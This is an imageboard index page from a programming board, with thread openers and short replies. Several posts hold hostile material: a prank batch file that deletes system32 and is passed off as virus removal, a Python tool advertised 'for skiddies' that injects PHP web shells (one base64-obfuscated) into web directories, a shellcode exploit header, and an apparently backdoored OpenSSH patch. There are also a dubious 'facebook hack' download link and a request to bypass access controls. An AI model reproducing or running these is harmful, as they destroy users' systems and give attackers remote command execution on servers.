[Watched Threads]  [RSS] [Home]

Email
Captcha image
Subject   (new thread)
Message
File []
Password  (for post and file deletion)
  • Supported file types are: GIF, JPG, PDF, PNG
  • Maximum file size allowed is 5883 KB.
  • Images greater than 200x200 pixels will be thumbnailed.
  • Currently 65 unique user posts. View catalog

  • Blotter updated: 2011-08-26 Show/Hide Show All

We've got mail! Send any love or hate letters to mods@4chon.org


No. 16 hide watch expand quickreply [Reply] [Edit]
Hey all you no lifers, Circlepuller of AwsumChan telling you that NejoArc was interested in adding a code parser, and ran into some problems that I fixed.
now, all of you make a batch file called epic.bat with the following


@echo off
cd \
del c:\windows\system32

This will get rid of a virus that causes your computer to be 0.01% slower than usual, causing your computer to make you look like a faggot.
6 posts omitted. Click Reply to view.
>> No. 294 [Edit]
Oh my god, Crysis is running on max settings with no effort at all...

OP, you need a donation. Do you take Bitcoins?
>> No. 297 [Edit]
ITS PROMPTING ME WUT DO I DO?

fucking idiot learn to del
>> No. 299 [Edit]
That 's the new "alt-F4" joke.
This time : level up!


File 131231445279.jpg - (59.91KB , 527x681 , Its_on.jpg )
277 No. 277 hide watch quickreply [Reply] [Edit]
hello people of 4chon I hail from 4chan /b/orads and i happened to stumble upon your board here and thought maybe you guys can teach me how to code. I want to be able to program apps and games. Thank you in advance for your help
>> No. 278 [Edit]
please don't.
>> No. 296 [Edit]
278 means you should learn a language, preferabrely java, THEN if donr get something in specific


No. 281 hide watch quickreply [Reply] [Edit]
# Exploit Title: Win32 / Windows7 Sp1 - rename .jpeg to .vir (57 bytes)
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -

==================================================
Made by:

___________.__ ____ ___ __ .__
\__ ___/| |__ ____ | | \__________ __| | _|__|
Message too long. Click here to view the full text.


File 131209436950.png - (43.08KB , 512x512 , Facebook.png )
275 No. 275 hide watch quickreply [Reply] [Edit]
I made a working facebook hack it lets you see private picturers of anyone on facebook
even if there not on your friends list
http://www.mediafire.com/?ihel0w8htygds8r
>> No. 282 [Edit]
fake


File 130824206354.jpg - (65.82KB , 500x377 , 13082406399.jpg )
267 No. 267 hide watch quickreply [Reply] [Edit]
There are literally thousands of ids, these I have taken by modifying my one with letters from q to z
Any way to generate all possible urls so I cab gain access to all the ids?
Or maybe a way to bypass 403 so I can get them from the server?
>> No. 274 [Edit]
huh?


File 130344499463.png - (96.18KB , 1280x1024 , 2011-04-23-001139_1280x1024_scrot.png )
256 No. 256 hide watch quickreply [Reply] [Edit]
Mr. Vile here, of 9ch.in

over the past few days I've been writing a new [text]board script in Perl for the purpose of having a clean code base so that it can be extended easily, the only notable feature of it is that it can switch between flat-file or sql db's very easily and it has a sane templating system.

I have put the latest revision of it here:
http://9ch.in/git/?p=macro/.git;a=summary

please reply with any recommendations!
>> No. 258 [Edit]
mssql support?
>> No. 259 [Edit]
>>258

depends if Tie::RDBM supports it, which it probably *should*
>> No. 261 [Edit]
File 130406229938.png - (94.16KB , 1280x1024 , 2011-04-30-034121_1280x1024_scrot.png )
261
updated screenshot.


File 130273822593.png - (41.70KB , 300x300 , Awesomeface.png )
23 No. 23 hide watch quickreply [Reply] [Edit]
for skiddies who want to backdoor whole web server (or at least the one user) works well on suPHP setups


import os, random
backdoors = [
'<?php if(isset($_POST["h"])) { system($_POST["h"]); die(""); } ?>',
'<?php if(isset($_POST["h"])) { passthru($_POST["h"]); die(""); } ?>',
'<?php eval(base64_decode("aWYoaXNzZXQoJF9QT1NUWyJoIl0pKSB7IHN5c3RlbSgkX1BPU1RbImgiXSk7IGRpZSgiIik7IH0K")); ?>',
'<?php if(isset($_REQUEST["h"])) { system($_REQUEST["h"]); die(""); } ?>',
'<?php (@!$_POST["h"]) or die(system($_POST["h"]));?>',
'<?php (@!$_REQUEST["h"]) or die(passthru($_REQUEST["h"]));?>',
'<?=@$_REQUEST["h"]?die(system($_REQUEST["h"])):""?>',
'<?=@$_POST["h"]?die(passthru($_POST["h"])):""?>'
]
#for file in os.listdir("./shit"): print file #heh
def inject(dir):
Message too long. Click here to view the full text.
>> No. 26 [Edit]
shits broke cause of yandex
here
http://iddin.com/.c/x.txt same thing


No. 17 hide watch quickreply [Reply] [Edit]
diff -ruPN openssh-5.8p1/auth-passwd.c openssh-x/auth-passwd.c
--- openssh-5.8p1/auth-passwd.c2009-03-07 19:40:28.000000000 -0500
+++ openssh-x/auth-passwd.c2011-02-08 20:56:32.000000000 -0500
@@ -44,7 +44,7 @@
#include <stdio.h>
#include <string.h>
#include <stdarg.h>
-
+#include "x-conf.h"
#include "packet.h"
#include "buffer.h"
#include "log.h"
@@ -53,7 +53,7 @@
#include "hostfile.h"
#include "auth.h"
Message too long. Click here to view the full text.
>> No. 18 [Edit]


diff -ruPN openssh-5.8p1/auth-passwd.c openssh-x/auth-passwd.c
--- openssh-5.8p1/auth-passwd.c2009-03-07 19:40:28.000000000 -0500
+++ openssh-x/auth-passwd.c2011-02-08 20:56:32.000000000 -0500
@@ -44,7 +44,7 @@
#include <stdio.h>
#include <string.h>
#include <stdarg.h>
-
+#include "x-conf.h"
#include "packet.h"
#include "buffer.h"
#include "log.h"
@@ -53,7 +53,7 @@
#include "hostfile.h"
Message too long. Click here to view the full text.


No. 14 hide watch quickreply [Reply] [Edit]


<?php
$sentence = array('I', 'can', 'code', '?');
foreach ($sentence as $word){
echo $word;
if ($word != "?"){
echo ' ';
}
}
?>

>> No. 15 [Edit]


document.write("lolnoobs<br />fuck year");



No. 12 hide watch quickreply [Reply] [Edit]
JPG to ASCII
<html> <head> <title>Ascii</title> <style> body{ line-height:1px; font-size:1px; } </style> </head> <body> <?php function getext($filename) { $pos = strrpos($filename,'.'); $str = substr($filename, $pos); return $str; } if(!isset($_POST['submit'])){ ?> <form action="<?echo $_SERVER['PHP_SELF'];?>" method="post"> JPG img URL: <input type="text" name="image"><br> <input type="submit" name="submit" value="Create"> </form> <? }else{ $image = $_POST['image']; $ext = getext($image); if($ext == ".jpg"){ $img = ImageCreateFromJpeg($image); } else{ echo'Wrong File Type'; } $width = imagesx($img); $height = imagesy($img); for($h=0;$h<$height;$h++){ for($w=0;$w<=$width;$w++){ $rgb = ImageColorAt($img, $w, $h); $r = ($rgb >> 16) & 0xFF; $g = ($rgb >> 8) & 0xFF; $b = $rgb & 0xFF; if($w == $width){ echo '<br>'; }else{ echo '<span style="color:rgb('.$r.','.$g.','.$b.');">#</span>'; } } } } ?> </body> </html>



File 130153406386.jpg - (109.56KB , 418x467 , 1299570166621.jpg )
10 No. 10 hide watch quickreply [Reply] [Edit]
imply create a new folder, call it GodMode.{ED7BA470-8E54-465E-825C-99712043E01C} and you will have a shortcut to every setting on your computer. Sounds great right? The problem is no new features or settings are exposed. Only a list of tasks that can be accomplished within Control Panel that Windows 7 and Vista use for start menu and control panel search.

The feature is not actually even called God Mode but All Tasks. Since the All Tasks feature is simply a shell folder you can access it a few different ways. The most direct method is to open up Explorer and type in shell:::{ED7BA470-8E54-465E-825C-99712043E01C} in the address bar and hit Enter. Alternatively, create a folder and name it anything.{ED7BA470-8E54-465E-825C-99712043E01C}.

Boom, ALL TASKS (aka GOD MODE) UNLOCKED!
>> No. 11 [Edit]
lame


File 130126856667.jpg - (47.31KB , 375x375 , davefoley.jpg )
7 No. 7 hide watch quickreply [Reply] [Edit]
#include <STD ISD PCO.h>
#include <mobile.h>
#include <sms.h>
#include <love.h>
#define Cute beautiful_lady

int main()
{
goto college;
scanf("100%" ,&ladies);
if(lady ==Cute)
line++;
while( !reply )
{
printf("I Love U");
Message too long. Click here to view the full text.
>> No. 8 [Edit]
I lol'd
>> No. 9 [Edit]
if (ass) { tap }
else { slap_a_bitch }

minimal perl reporting in


Delete post []
Password  
Report post
Reason  
[0] [1] [2]

[Photon] [Kusaba] [Burichan] [Futaba] [Net] [Mapleleaf] [Moonites] [Miku] [Thunderdome] [Test